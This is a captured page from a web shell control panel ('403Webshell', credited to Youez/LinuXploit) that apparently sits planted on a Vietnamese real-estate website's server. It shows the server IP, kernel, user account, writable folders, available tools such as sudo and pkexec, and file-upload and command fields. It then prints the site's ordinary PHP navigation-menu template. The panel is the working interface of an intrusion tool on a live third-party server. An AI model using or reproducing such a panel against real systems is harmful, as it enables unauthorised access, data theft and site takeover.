403Webshell
Server IP : 103.48.194.25  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
User : sieuthimay ( 1016)
PHP Version : 8.2.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/nhadatkhangdien.net-bk/public_html/templates/layout/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/nhadatkhangdien.net-bk/public_html/templates/layout/menu14-03-2018.php
<?
    $d->reset();
    $sql="select * from #_product_cat order by stt";
    $d->query($sql);
    $cat=$d->result_array();
    $sql="select * from #_gioithieu_item order by stt";
    $d->query($sql);
    $gtttt=$d->result_array();
?>

<ul>
    <li <?php if($com == ''){?>class="act" <?php } ?>> <a  href="">Trang chủ</a> </li>
    <li  <?php if($com == 'gioi-thieu'){?>class="act" <?php } ?>> <a href="gioi-thieu"> Giới thiệu</a>
        <ul>
            <? for($i=0;$i<count($gtttt);$i++){
                $d->reset();
                $sql="select * from #_gioithieu where id_item='".$gtttt[$i]['id']."' order by stt";
                $d->query($sql);
                $gti=$d->result_array();
            ?>
            <li> <a href="gioi-thieu/<?=$gtttt[$i]['tenkhongdau']?>">
                <?=$gtttt[$i]['ten']?>
                </a>
                <ul>
                    <? for($j=0;$j<count($gti);$j++){?>
                    <li><a href="gioi-thieu/<?=$gti[$j]['tenkhongdau']?>/<?=$gti[$j]['id']?>">
                        <?=$gti[$j]['ten']?>
                        </a></li>
                    <? }?>
                </ul>
            </li>
            <? }?>
            <li><a href="video">Video Khang Điền</a></li>
        </ul>
    </li>
    <li  <?php if($com == 'du-an'){?>class="act" <?php } ?>>
        <h2><a href="du-an"> Dự án</a></h2>
        <ul>
            <? for($i=0;$i<count($cat);$i++){
                 $d->reset();
                $sql="select * from #_product_list where id_cat='".$cat[$i]['id']."' order by stt";
                $d->query($sql);
                $list=$d->result_array();
            ?>
            <li><a href="du-an/<?=$cat[$i]['tenkhongdau']?>">
                <?=$cat[$i]['ten']?>
                </a>
                <ul>
                    <? for($j=0;$j<count($list);$j++){?>
                    <li><a href="du-an/<?=$cat[$i]['tenkhongdau']?>/<?=$list[$i]['tenkhongdau']?>">
                        <?=$list[$j]['ten']?>
                        </a> </li>
                    <? }?>
                </ul>
            </li>
            <? }?>
        </ul>
    </li>
    <li  <?php if($com == 'news'){?>class="act" <?php } ?>>
        <h2><a href="news"> Tin tức - Sự kiện</a></h2>
    </li>
    <li  <?php if($com == 'lien-he'){?>class="act" <?php } ?>> <a href="lien-he"> Liên hệ</a> </li>
</ul>
<div class="clear"></div>

Youez - 2016 - github.com/yon3zu
LinuXploit